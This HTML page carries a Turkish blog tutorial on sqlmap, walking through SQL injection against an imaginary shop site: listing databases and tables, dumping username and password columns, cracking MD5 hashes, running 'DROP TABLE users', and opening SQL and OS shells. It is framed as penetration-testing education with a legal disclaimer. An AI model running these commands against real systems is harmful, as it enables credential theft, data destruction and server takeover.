    <!DOCTYPE html>
<html lang="tr">
	<head>
		<meta charset="utf-8">
		<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
		<meta name="viewport" content="width=device-width, initial-scale=1">
		<meta name="author" content="ozzyBlog">
		<meta name="description" content="#coder #techlover">
		<meta name="generator" content="Hugo 0.29" />
		<title>SQLMAP Kullanımı &middot; ozzyBlog</title>
		<link rel="shortcut icon" href="/images/favicon.ico">
		<link rel="stylesheet" href="/css/style.css">
		<link rel="stylesheet" href="/css/highlight.css">
		

		
		<link rel="stylesheet" href="/css/font-awesome.min.css">
		

		
		<link href="/index.xml" rel="alternate" type="application/rss+xml" title="ozzyBlog" />
		
	</head>

    <body>
       <nav class="main-nav">
	
	
		<a href='/'> <span class="arrow">←&nbsp;</span>Ana Sayfa</a>
	
	<a href='/post'>Arşiv</a>
	<a href='/tags'>Etiketler</a>
	<a href='/about'>Hakkımda</a>

	

	
	<a class="cta" href="/index.xml">Takip Et</a>
	
</nav>


        <section id="wrapper">
            <article class="post">
                <header>
                    <h1>
                        SQLMAP Kullanımı
                    </h1>
                    <h2 class="headline">
                      <div class="infos"><span class="info">Yayın Tarihi : 26/07/2015</span><span class="info">Tahmini okuma süresi : 5 dakika</span></div>
                      <div class="tags">
                      
                      
                          
                              <a href="/tags/sql"><i class="fa fa-tag"></i>sql</a>
                          
                              <a href="/tags/injection"><i class="fa fa-tag"></i>injection</a>
                          
                              <a href="/tags/sqlmap"><i class="fa fa-tag"></i>sqlmap</a>
                          
                              <a href="/tags/pentest"><i class="fa fa-tag"></i>pentest</a>
                          
                              <a href="/tags/vulnerabilities"><i class="fa fa-tag"></i>vulnerabilities</a>
                          
                      
                      
                      </div>
                    </h2>
                </header>
                
                <section id="post-body">
                    <blockquote>
<p><strong>Yasal Uyarı</strong> : Bu makalede anlatılan SQLMAP yazılımı ile ilgili bilgiler tamamen bilgiyi öğrenecek kişinin kendi yazılım ve sistemlerinde sızma testi yapabilmesi için verilmiş bilgiler olup, başkaları üzerinde herhangi bir zarar vermek ya da saklanması gereken herhangi bir bilgiyi ortaya çıkarmak amacı ile kullanılması durumunda tüm sorumluluğu kullanan kişiye aittir. Blog yazarı oluşabilecek herhangi bir zarardan sorumlu tutulamaz!</p>
</blockquote>

<p>SQL injection genellikle kodlamaya yeni başlamış ve SQL ile çalışmak durumunda kalan kişilerin korkulu rüyalarından biridir. Aslında kurtulması çok kolay olan bir açık türü olsa da makalemizin konusunu bu durumdan nasıl kurtulabileceğiniz değil, bu durumu nasıl test edersiniz ve açığın size zararının ne kadar olacağının testini yapmaktır. Kurtulma yolları ayrı bir makale olabileceği için şimdilik okuyanları yönlendirmek adına <strong>prepared statements</strong> başlığını arama motorlarında arayarak ön bilgi alabilirler.</p>

<p>Test edeceğimiz açığımız olan SQL injection ya da Türkçe adı ile yapılandırılmış sorgu dili enjeksiyonu; isminden de anlaşılacağı üzere var olan sorguların arasına girip farklı sorgular çalıştırmak mantığına dayanır. Bu yüzden sorgunun sözdizimini bozabilecek karakterler ve ek sorgular gönderip SQL sunucunuza ek işler yaptırabilirsiniz. Bu test işini otomatize eden araçlardan biri de python ile yazılmış bir SQL injection aracı olan SQLMAP; teknik olarak sunucuya giden her türlü trafik üzerinen bu testi yapabilecek olsa da biz en yaygın olan <strong>GET</strong> istekleri üzerinden testimizi yapacağız.</p>

<p>Hemen kafamızdan bir senaryo uyduralım. Hayali bir alış-veriş sitemiz olsun ve bu sitemizin adresi hiçbir yere referans vermemek adına <strong><a href="http://al-ver.dev" target="_blank">http://al-ver.dev</a></strong> olsun. Herhangi bir ürünün detaylarını da <strong><a href="http://al-ver.dev/urundetay?urun=15" target="_blank">http://al-ver.dev/urundetay?urun=15</a></strong> gibi bir bağlantı ile alıyor olalım. Özellikle herhangi bir programlama diline de referans göstermek istemiyorum çünkü bu hata bir programlama dili ile alakalı olarak değil, tamamen yazılımcı ile ilgili bir bilgi eksikliği sonucu, derlenen ya da yorumlanan bütün programlama dilleri ile yazılmış yazılımlarda oluşabilir.</p>

<p>Senaryomuzdaki URLden urun parametresine 15 değerini verip sunucu tarafında 15 numaralı IDye sahip ürünü sorguladığımızı düşünürsek ve bu parametre sorgumuza direkt olarak ekleniyorsa, elle gireceğimiz başka karakterler ile sunucuda çalıştırılan sorgumuzu bozabiliriz. Örneğin 15&rsquo;in sonuna bir tek tırnak <strong>( &lsquo; )</strong> eklediğimizde SQL sözdizimi bozulacağı için ekranda bir hata mesajı görmeniz olası olabilir. Bu gibi bir durumda bu URLimizi SQLMAP ile kullanarak daha fazla veriye erişebilmemizin yolu açılabilir.</p>

<p>İlk olarak açık bulduğumuz URL&rsquo;mizi <strong>-u</strong> anahtarına argüman olarak gönderiyoruz ve ardından istediğimiz özellikle ilgili anahtarı ve argümanı komutumuza paslıyoruz. Sonra bize dönen çıktılarla yavaş yavaş ilerlemeye devam ediyoruz.</p>

<p>İlk önce :</p>

<pre><code class="language-sh">sqlmap -u http://al-ver.dev/urundetay?urun=15 --dbs
</code></pre>

<p>komutunu verip sunucumuz üzerindeki tüm databaselerin listesini istiyoruz. İlk defa komutu verdiğimizde script bizim için ilk testleri yapıp database sunucusunu tipini tespit etmek ve komutları verebilmek için çeşitli testler yapmak isteyecek ve bunların onayını almak için size birkaç soru soracak. Buradaki adımları isterseniz atlayabilirsiniz ya da database sunucusunun tipini biliyorsanız (bizim senaryomuzda bunun MySQL olduğunu varsayacağım) aşağıdaki gibi bir komut verip sunucu tespiti için yapılacak testlerin bir kısmını atlayabilirsiniz:</p>

<pre><code class="language-sh">sqlmap -u http://al-ver.dev/urundetay?urun=15 --dbs --dbms=mysql
</code></pre>

<p>Buradaki <code>--dbs</code> anahtarı ile açığımızın olduğu sayfa üzerinden sunucudaki veritabanlarının listesini istiyoruz. Ayrıca opsiyonel olarak girdiğimiz <code>--dbms=mysql</code> anahtar ve değeri ile de database yönetim sisteminin script&rsquo;e MySQL olduğunu söylüyoruz.</p>

<p>Gelen veritabanı listelerinden bizim işimize yarayacak veritabanının isminin <strong>ornekDB</strong> olduğunu varsayarak yeni komutumuzla devam ediyoruz ve tabloların listesini istiyoruz.</p>

<pre><code class="language-sh">sqlmap -u http://al-ver.dev/urundetay?urun=15 -D ornekDB --tables
</code></pre>

<p>Verdiğimiz komuttaki <code>-D ornekDB</code> anahtar-değer ikilisi ile seçtiğimiz veritabanının <strong>ornekDB</strong> olduğunu garantiliyoruz ve <code>--tables</code> anahtarı ile seçtiğimiz veritabanının tablolarının listesini istiyoruz.</p>

<p>İsteğimizden dönen tablo listesinden içerisindeki verilere ulaşmak istediğimiz bir tabloyu seçip komutlarımıza devam ediyoruz.</p>

<pre><code class="language-sh">sqlmap -u http://al-ver.dev/urundetay?urun=15 -D ornekDB -T users --columns
</code></pre>

<p>Yukarıdaki komutla <strong>ornekDB</strong> veritabanında <strong>users</strong> tablosu altındaki kolonları istiyoruz. Anahtar-değer ilikilerini açıklayacak olursak daha önceki komuttan hatırlayacağımız <code>-D ornekDB</code> ikilisi <strong>ornekDB</strong> veri tabanını seçitor, <code>-T users</code> anahtar-değer ikilisi <strong>users</strong> tablosunu seçiyor ve <code>--columns</code> anahtarı ise bizim seçtiğimiz tablodaki kolonların listesini sorgulamamızı sağlıyor.</p>

<p>Şu aşamadan sonra yapmamız gereken tablodaki istediğimiz alanlardan verileri almak olacak. Bunun için de şu komutu veriyoruz:</p>

<pre><code class="language-sh">sqlmap -u http://al-ver.dev/urundetay?urun=15 -D ornekDB -T users -C username,password --dump
</code></pre>

<p>Bu komutun önceki komuttan farklarını açıklayacak olursak <code>-C username,password</code> ikilisi ile user tablosundan <strong>username</strong> ve <strong>password</strong> kolonlarını istiyoruz ve <code>--dump</code> anahtarı ile bize aldığı verileri ekrana basmasını istiyoruz.</p>

<p>Bundan sonrasında aldığımız parola hashlenmemiş ve açık olarak kaydedilmişse istersek sisteme giriş yapıp siteyi ele geçirebiliriz. Ya da hashlenmişse bile bazı online araçlar ile hash&rsquo;in tipini belirleyip kırma yöntemine gidebiliriz. Ayrıca SQLMAP kendi içerisinde MD5 kırmak için bir araçla gelir ve bulduğu hash&rsquo;lerde MD5&rsquo;i tespit ettiği zaman size; &ldquo;kırmayı denememi ister misiniz?&rdquo; benzeri bir soru sorar. Eğer onaylarsanız da sizin için MD5 hashlerini kırmaya çalışır.</p>

<p>Buraya kadarki komutlara ek olarak bulduğumuz veri tabanına kendi özel sorgularımızı da gönderebiliriz. Örneğin:</p>

<pre><code class="language-sh">sqlmap -u http://al-ver.dev/urundetay?urun=15 -D ornekDB --sql-query=&quot;DROP TABLE users&quot;
</code></pre>

<p>komutu ornekDB üzerinde <code>DROP TABLE users</code> sorgusunu çalıştırır. Tabi bu komutun kullanıcı izinleri ile alakalı olarak çalıştırılma yetkisi olmayabilir. Ayrıca istersek interaktif SQL komut istemini de şu komut ile kullanabiliriz:</p>

<pre><code class="language-sh">sqlmap -u http://al-ver.dev/urundetay?urun=15 -D ornekDB --sql-shell
</code></pre>

<p>Bu komuttan sonra interaktif komut istemine bağlanıp yetkilerimiz dahilinde istediğimiz şeyleri komut konsolundan yapabiliriz.</p>

<p>Hep yetkilerden bahsediyoruz ama bu yetkiler nedir kimin yetkisidir diye soracak olursak da veritabanına erişim yetkisi olan veritabanı sunucusuna özel kullanıcıya ait yetkilerdir.</p>

<pre><code class="language-sh">sqlmap -u http://al-ver.dev/urundetay?urun=15 --users
</code></pre>

<p>Komutu ile veritabanı sunucumuzdaki kullanıcıların listesini alabiliriz.</p>

<pre><code class="language-sh">sqlmap -u http://al-ver.dev/urundetay?urun=15 --passwords
</code></pre>

<p>Komutu ile veritabanı sunucumuzdaki kullanıcıların parolalarını alabiliriz.</p>

<pre><code class="language-sh">sqlmap -u http://al-ver.dev/urundetay?urun=15 --privileges
</code></pre>

<p>Komutu ile de tanımlı kullanıcıların yetkilerini görebiliriz.</p>

<p>Ayrıca yetkilerimizin fazla olduğunu varsayarak işletim sistemine erişim yetkimiz varsa eğer şu komutla :</p>

<pre><code class="language-sh">sqlmap -u http://al-ver.dev/urundetay?urun=15 --os-cmd=&quot;pwd&quot;
</code></pre>

<p>işletim sistemimize belirleyeceğimiz bir komutu gönderebiliriz. Buradaki <code>pwd</code> komutu komutun çalıştığı klasörün ismini basar. (<strong>P</strong>rint <strong>W</strong>orking <strong>D</strong>irectory)</p>

<p>Ayrıca şu komut ile de;</p>

<pre><code class="language-sh">sqlmap -u http://al-ver.dev/urundetay?urun=15 --os-shell
</code></pre>

<p>interaktif komut istemine bağlanıp bir nevi reverse shell (netcat ile yapılan gibi) yaparak istediğimiz gibi makinayı yönetebilme şansımız var.</p>

<p>SQLMAP ile ilgili temel bir kullanım bilgisi içeren bu makalenin, daha güvenli yazılımlar geliştirmeniz konusunda sizlere yardımcı rehber olabilmesi dileği ile&hellip;</p>

                </section>
            </article>

            
                <div id="disqus_thread"></div>
<script type="text/javascript">
    var disqus_shortname = 'ozzyblog'; 

     
    (function() {
        var dsq = document.createElement('script'); dsq.type = 'text/javascript'; dsq.async = true;
        dsq.src = '//' + disqus_shortname + '.disqus.com/embed.js';
        (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq);
    })();
</script>
<noscript>Please enable JavaScript to view the <a href="https://disqus.com/?ref_noscript">comments powered by Disqus.</a></noscript>
</div>

            

            <footer id="footer">
    
        <div id="social">

	
	
    <a class="symbol" href="https://www.github.com/ozguncagri" target="_blank">
        <i class="fa fa-github-square"></i>
    </a>
    


</div>

    
    <p class="small">
    
        Bu blogdaki herşey MIT lisansı ile lisanslanmıştır!
    
    </p>
</footer>

        </section>

        <script src="/js/jquery-2.2.4.min.js"></script>
<script src="/js/main.js"></script>
<script src="/js/highlight.min.js"></script>
<script>hljs.initHighlightingOnLoad();</script>





    </body>
</html>
